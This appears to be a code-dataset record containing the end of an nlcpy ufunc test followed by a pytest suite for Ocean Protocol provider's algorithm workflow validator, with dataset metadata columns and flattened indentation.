elif mode == 'array_scalar':
param = itertools.product(
shape, order_x, order_out, order_where, dtype_x,
dtype_y, dtype_out, dtype_arg, order_arg, casting)
elif mode == 'scalar_scalar':
param = itertools.product(
order_out, order_where, dtype_x, dtype_y, dtype_out,
dtype_arg, casting)
else:
raise TypeError('unknown mode was detected.')
for p in param:
if mode == 'array_array':
shape1 = p[0][0]
shape2 = p[0][1]
order = p[9]
casting = p[10]
in1 = ufunc._create_random_array(shape1, p[1], p[5], minval, maxval)
in2 = ufunc._create_random_array(shape2, p[2], p[6], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[3], p[7], ufunc_name)
where = ufunc._create_random_array(
out.shape, p[4], ufunc.DT_BOOL, minval, maxval)
dtype = numpy.dtype(p[8])
worst_dtype = ufunc._guess_worst_dtype(
(in1.dtype, in2.dtype, out.dtype, dtype))
elif mode == 'array_scalar':
shape1 = p[0][0]
order = p[8]
casting = p[9]
in1 = ufunc._create_random_array(shape1, p[1], p[4], minval, maxval)
in2 = ufunc._create_random_scalar(p[5], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[2], p[6], ufunc_name)
where = ufunc._create_random_array(
out.shape, p[3], ufunc.DT_BOOL, minval, maxval)
dt_in2 = numpy.dtype(p[5])
dtype = numpy.dtype(p[7])
worst_dtype = ufunc._guess_worst_dtype(
(in1.dtype, dt_in2, out.dtype, dtype))
elif mode == 'scalar_scalar':
order = 'K'
casting = p[6]
in1 = ufunc._create_random_scalar(p[2], minval, maxval)
in2 = ufunc._create_random_scalar(p[3], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[0], p[4], ufunc_name)
where = ufunc._create_random_array(
out.shape, p[1], ufunc.DT_BOOL, minval, maxval)
dt_in1 = numpy.dtype(p[2])
dt_in2 = numpy.dtype(p[3])
dtype = numpy.dtype(p[5])
worst_dtype = ufunc._guess_worst_dtype(
(dt_in1, dt_in2, out.dtype, dtype))
kw[name_in1] = in1
kw[name_in2] = in2
kw[name_out] = out
kw[name_where] = where
kw[name_dtype] = dtype
if ufunc_name == 'outer':
kw[name_order] = order
kw[name_casting] = casting
nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
self, args, kw, impl, name_xp, op, True, Exception)
# result check
if nlcpy_result is not None and numpy_result is not None:
for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
ufunc._check_ufunc_result(
op,
worst_dtype,
nlcpy_r,
numpy_r,
in1=in1,
in2=in2,
out=out,
where=where,
dtype=dtype)
| 42.142342
| 88
| 0.577622
| 3,131
| 23,389
| 4.051741
| 0.072501
| 0.027432
| 0.056283
| 0.022702
| 0.856062
| 0.845499
| 0.837853
| 0.810421
| 0.808529
| 0.801513
| 0
| 0.035532
| 0.320151
| 23,389
| 554
| 89
| 42.218412
| 0.762279
| 0.078498
| 0
| 0.718163
| 0
| 0
| 0.032589
| 0
| 0
| 0
| 0
| 0.001805
| 0
| 1
| 0.016701
| false
| 0
| 0.010438
| 0
| 0.031315
| 0.002088
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80f15340b11f379acd3b89e68aa87be8bbeef266
| 32,692
|
py
|
Python
|
ocean_provider/validation/test/test_algo_validation.py
|
oceanprotocol/provider-service-py
|
408a9032b30d3606a6b991f3982b7d17ded7cd47
|
[
"Apache-2.0"
] | null | null | null |
ocean_provider/validation/test/test_algo_validation.py
|
oceanprotocol/provider-service-py
|
408a9032b30d3606a6b991f3982b7d17ded7cd47
|
[
"Apache-2.0"
] | null | null | null |
ocean_provider/validation/test/test_algo_validation.py
|
oceanprotocol/provider-service-py
|
408a9032b30d3606a6b991f3982b7d17ded7cd47
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2021 Ocean Protocol Foundation
# SPDX-License-Identifier: Apache-2.0
#
import copy
from unittest.mock import Mock, patch
import pytest
from ocean_provider.utils.asset import Asset
from ocean_provider.utils.basics import get_web3
from ocean_provider.utils.services import Service, ServiceType
from ocean_provider.validation.algo import WorkflowValidator
from tests.ddo.ddo_sample1_compute import alg_ddo_dict, ddo_dict
from tests.helpers.compute_helpers import get_future_valid_until
from tests.test_helpers import get_first_service_by_type
provider_fees_event = Mock()
provider_fees_event.args.providerData = {"environment": "ocean-compute"}
provider_fees_event.args.validUntil = get_future_valid_until()
provider_fees_event.args.providerFeeAmount = 0
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_passes_algo_ddo(provider_wallet, consumer_address, web3):
"""Tests happy flow of validator with algo ddo."""
web3 = get_web3()
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
"algorithm": {
"documentId": alg_ddo.did,
"serviceId": sa_compute.id,
"transferTxId": "alg_tx_id",
},
"environment": "ocean-compute",
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is True
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_passes_raw(provider_wallet, consumer_address, web3):
"""Tests happy flow of validator with raw algo."""
web3 = get_web3()
ddo = Asset(ddo_dict)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
"algorithm": {
"serviceId": sa.id,
"meta": {
"rawcode": "console.log('Hello world'!)",
"format": "docker-image",
"version": "0.1",
"container": {"entrypoint": "node $ALGO", "image": "node", "tag": "10"},
},
},
"environment": "ocean-compute",
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is True
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_fails_not_an_algo(provider_wallet, consumer_address, web3):
"""Tests happy flow of validator with algo ddo."""
_copy = copy.deepcopy(ddo_dict)
_copy["services"][0]["compute"]["publisherTrustedAlgorithms"] = []
ddo = Asset(_copy)
did = ddo.did
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"documentId": did,
"serviceId": sa_compute.id,
"transferTxId": "alg_tx_id",
},
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert validator.error == f"DID {did} is not a valid algorithm"
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_fails_meta_issues(provider_wallet, consumer_address, web3):
"""Tests happy flow of validator with raw algo."""
ddo = Asset(ddo_dict)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
"""Tests happy flow of validator with algo ddo and raw algo."""
data = {
"dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
"algorithm": {"serviceId": sa.id, "meta": {}},
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== "algorithmMeta must define one of `url` or `rawcode` or `remote`, but all seem missing."
)
# algorithmMeta container is empty
data = {
"dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa.id,
"meta": {
"rawcode": "console.log('Hello world'!)",
"format": "docker-image",
"version": "0.1",
"container": {},
},
},
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== "algorithm `container` must specify values for all of entrypoint, image and tag."
)
# algorithmMeta container is missing image
data = {
"dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa.id,
"meta": {
"rawcode": "console.log('Hello world'!)",
"format": "docker-image",
"version": "0.1",
"container": {"entrypoint": "node $ALGO", "tag": "10"},
},
},
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== "algorithm `container` must specify values for all of entrypoint, image and tag."
)
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_additional_datasets(provider_wallet, consumer_address, web3):
web3 = get_web3()
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
"algorithm": {
"documentId": alg_ddo.did,
"serviceId": sa_compute.id,
"transferTxId": "alg_tx_id",
},
"additionalDatasets": "",
"environment": "ocean-compute",
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
# basically the same test as test_passes_algo_ddo, additionalDatasets is empty
assert validator.validate() is True
# additional input is invalid
data = {
"dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa_compute.id,
"documentId": alg_ddo.did,
"transferTxId": "alg_tx_id",
},
"additionalDatasets": "i can not be decoded in json!",
}
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert validator.error == "Additional input is invalid or can not be decoded."
did = ddo.did
# Missing did in additional input
data = {
"dataset": {"documentId": did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa_compute.id,
"documentId": alg_ddo.did,
"transferTxId": "alg_tx_id",
},
"additionalDatasets": [{"transferTxId": "tx_id", "serviceId": sa.id}],
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error == "Error in input at index 1: No documentId in input item."
)
# Did is not valid
data = {
"dataset": {"documentId": did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa_compute.id,
"documentId": alg_ddo.did,
"transferTxId": "alg_tx_id",
},
"additionalDatasets": [
{
"documentId": "i am not a did",
"transferTxId": "tx_id",
"serviceId": sa.id,
}
],
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== "Error in input at index 1: Asset for did i am not a did not found."
)
data = {
"dataset": {"documentId": did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa_compute.id,
"documentId": alg_ddo.did,
"transferTxId": "alg_tx_id",
},
"additionalDatasets": [
{
"documentId": did,
"transferTxId": "tx_id",
"serviceId": "some other service id",
}
],
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== "Error in input at index 1: Service id some other service id not found."
)
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_service_not_compute(provider_wallet, consumer_address, web3):
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa_compute.id,
"documentId": alg_ddo.did,
"transferTxId": "alg_tx_id",
},
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
def other_service(*args, **kwargs):
return Service(
index=0,
service_id="smth_else",
service_type="something else",
datatoken_address="0xa",
service_endpoint="test",
encrypted_files="",
timeout=3600,
)
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
with patch(
"ocean_provider.utils.asset.Asset.get_service_by_id",
side_effect=other_service,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert validator.error == "Services in input can only be access or compute."
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_fails_trusted(provider_wallet, consumer_address, web3):
"""Tests possible failures of the algo validation."""
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
# Additional input has other trusted algs
_copy = copy.deepcopy(ddo_dict)
_copy["id"] = "0xtrust"
_copy["services"][0]["compute"]["publisherTrustedAlgorithms"] = [
{"did": "0xother", "filesChecksum": "mock", "containerSectionChecksum": "mock"}
]
trust_ddo = Asset(_copy)
trust_sa = get_first_service_by_type(trust_ddo, ServiceType.COMPUTE)
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo, trust_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
if trust_ddo.did == args[1]:
return trust_ddo
data = {
"dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa_compute.id,
"documentId": alg_ddo.did,
"transferTxId": "alg_tx_id",
},
"additionalDatasets": [
{
"documentId": trust_ddo.did,
"transferTxId": "trust_tx_id",
"serviceId": trust_sa.id,
}
],
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== f"Error in input at index 1: this algorithm did {alg_ddo.did} is not trusted."
)
# Additional input has other trusted publishers
_copy = copy.deepcopy(ddo_dict)
_copy["id"] = "0xtrust"
_copy["services"][0]["compute"]["publisherTrustedAlgorithmPublishers"] = ["0xabc"]
_copy["services"][0]["id"] = "compute_2"
trust_ddo = Asset(_copy)
trust_sa = get_first_service_by_type(trust_ddo, ServiceType.COMPUTE)
data = {
"dataset": {
"documentId": ddo.did,
"transferTxId": "trust_tx_id",
"serviceId": sa.id,
},
"algorithm": {
"documentId": alg_ddo.did,
"serviceId": sa_compute.id,
"transferTxId": "alg_tx_id",
},
"additionalDatasets": [
{
"documentId": trust_ddo.did,
"transferTxId": "trust_tx_id",
"serviceId": trust_sa.id,
}
],
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== "Error in input at index 1: this algorithm is not from a trusted publisher"
)
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch("ocean_provider.validation.algo.get_service_files_list", return_value=None)
def test_fails_no_asset_url(provider_wallet, consumer_address, web3):
ddo = Asset(ddo_dict)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
"algorithm": {"serviceId": sa.id, "meta": {}},
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== "Services in input with compute type must be in the same provider you are calling."
)
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch("ocean_provider.validation.algo.validate_order", side_effect=Exception("mock"))
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_fails_validate_order(provider_wallet, consumer_address, web3):
ddo = Asset(ddo_dict)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
"algorithm": {"serviceId": sa.id, "meta": {}},
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert validator.error == f"Order for serviceId {sa.id} is not valid. mock."
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_fails_no_service_id(provider_wallet, consumer_address, web3):
ddo = Asset(ddo_dict)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "serviceId": None, "transferTxId": "tx_id"},
"algorithm": {"serviceId": sa.id, "meta": {}},
}
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore", side_effect=[ddo]
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert validator.error == "No serviceId in input item."
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
@patch(
"ocean_provider.serializers.StageAlgoSerializer.serialize",
new=Mock(return_value={}),
)
def test_fails_invalid_algorithm_dict(provider_wallet, consumer_address, web3):
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
"algorithm": {
"documentId": alg_ddo.did,
"serviceId": sa_compute.id,
"transferTxId": "alg_tx_id",
},
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert validator.error == f"cannot get url for the algorithmDid {alg_ddo.did}"
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_fails_algorithm_in_use(provider_wallet, consumer_address, web3):
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
"algorithm": {
"documentId": alg_ddo.did,
"serviceId": sa_compute.id,
"transferTxId": "alg_tx_id",
},
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
def record_consume_request_side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[0]:
return ddo
if alg_ddo.did == args[0]:
raise Exception("I know Python!")
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
with patch(
"ocean_provider.validation.algo.record_consume_request",
side_effect=record_consume_request_side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== "Algorithm is already in use or can not be found on chain."
)
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_fail_wrong_algo_type(provider_wallet, consumer_address, web3):
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa_compute.id,
"documentId": alg_ddo.did,
"transferTxId": "alg_tx_id",
},
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
def other_service(*args, **kwargs):
return Service(
index=0,
service_id=data["algorithm"]["serviceId"],
service_type="access",
datatoken_address="0xa",
service_endpoint="test",
encrypted_files="",
timeout=3600,
)
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
with patch(
"ocean_provider.utils.asset.Asset.get_service_by_id",
side_effect=other_service,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert validator.error == "Service for main asset must be compute."
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_fail_allow_raw_false(provider_wallet, consumer_address, web3):
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
ddo.services[0].compute_dict["allowRawAlgorithm"] = False
data = {
"dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa_compute.id,
"meta": {
"rawcode": "console.log('Hello world'!)",
"format": "docker-image",
"version": "0.1",
"container": {"entrypoint": "node $ALGO", "image": "node", "tag": "10"},
},
},
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert validator.error == f"cannot run raw algorithm on this did {ddo.did}."
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
def test_success_multiple_services_types(provider_wallet, consumer_address, web3):
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {
"serviceId": sa_compute.id,
"meta": {
"rawcode": "console.log('Hello world'!)",
"format": "docker-image",
"version": "0.1",
"container": {"entrypoint": "node $ALGO", "image": "node", "tag": "10"},
},
},
"additionalDatasets": [
{"documentId": ddo.did, "transferTxId": "ddo.did", "serviceId": "access_1"}
],
"environment": "ocean-compute",
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
def another_side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if args[0].type == "access":
return None
return [{"url": "dummy"}]
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
with patch(
"ocean_provider.validation.algo.get_service_files_list",
side_effect=another_side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is True
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
def test_fail_missing_algo_meta_documentId(provider_wallet, consumer_address, web3):
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "transferTxId": "tx_id", "serviceId": sa.id},
"algorithm": {"serviceId": None, "meta": None},
"additionalDatasets": [
{"documentId": ddo.did, "transferTxId": "ddo.did", "serviceId": "access_1"}
],
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
def another_side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if args[0].type == "access":
return None
return [{"url": "dummy"}]
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
with patch(
"ocean_provider.validation.algo.get_service_files_list",
side_effect=another_side_effect,
):
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== "both meta and documentId are missing from algorithm input, at least one of these is required."
)
@pytest.mark.unit
@patch("ocean_provider.validation.algo.check_asset_consumable", return_value=(True, ""))
@patch(
"ocean_provider.validation.algo.validate_order",
return_value=(None, None, provider_fees_event),
)
@patch(
"ocean_provider.validation.algo.get_service_files_list",
return_value=[{"url": "dummy"}],
)
def test_fee_amount_not_paid(provider_wallet, consumer_address, web3):
"""Tests happy flow of validator with algo ddo."""
web3 = get_web3()
ddo = Asset(ddo_dict)
alg_ddo = Asset(alg_ddo_dict)
sa_compute = get_first_service_by_type(alg_ddo, ServiceType.ACCESS)
sa = get_first_service_by_type(ddo, ServiceType.COMPUTE)
data = {
"dataset": {"documentId": ddo.did, "serviceId": sa.id, "transferTxId": "tx_id"},
"algorithm": {
"documentId": alg_ddo.did,
"serviceId": sa_compute.id,
"transferTxId": "alg_tx_id",
},
}
def side_effect(*args, **kwargs):
nonlocal ddo, alg_ddo
if ddo.did == args[1]:
return ddo
if alg_ddo.did == args[1]:
return alg_ddo
with patch(
"ocean_provider.validation.algo.get_asset_from_metadatastore",
side_effect=side_effect,
):
with patch("ocean_provider.validation.algo.get_provider_fee_amount") as mock:
mock.return_value = 10**18
validator = WorkflowValidator(web3, consumer_address, provider_wallet, data)
assert validator.validate() is False
assert (
validator.error
== "Provider fees must be paid on the asset, OR on the algorithm ordered, OR on any additional input."
)
| 34.594709
| 118
| 0.630888
| 3,715
| 32,692
| 5.29179
| 0.060296
| 0.027774
| 0.072333
| 0.105753
| 0.882802
| 0.866779
| 0.862048
| 0.858792
| 0.854621
| 0.852637
| 0
| 0.005598
| 0.245993
| 32,692
| 944
| 119
| 34.631356
| 0.791927
| 0.020311
| 0
| 0.771463
| 0
| 0.002418
| 0.280362
| 0.134636
| 0
| 0
| 0.000345
| 0
| 0.053204
| 1
| 0.041112
| false
| 0.002418
| 0.012092
| 0.002418
| 0.091898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
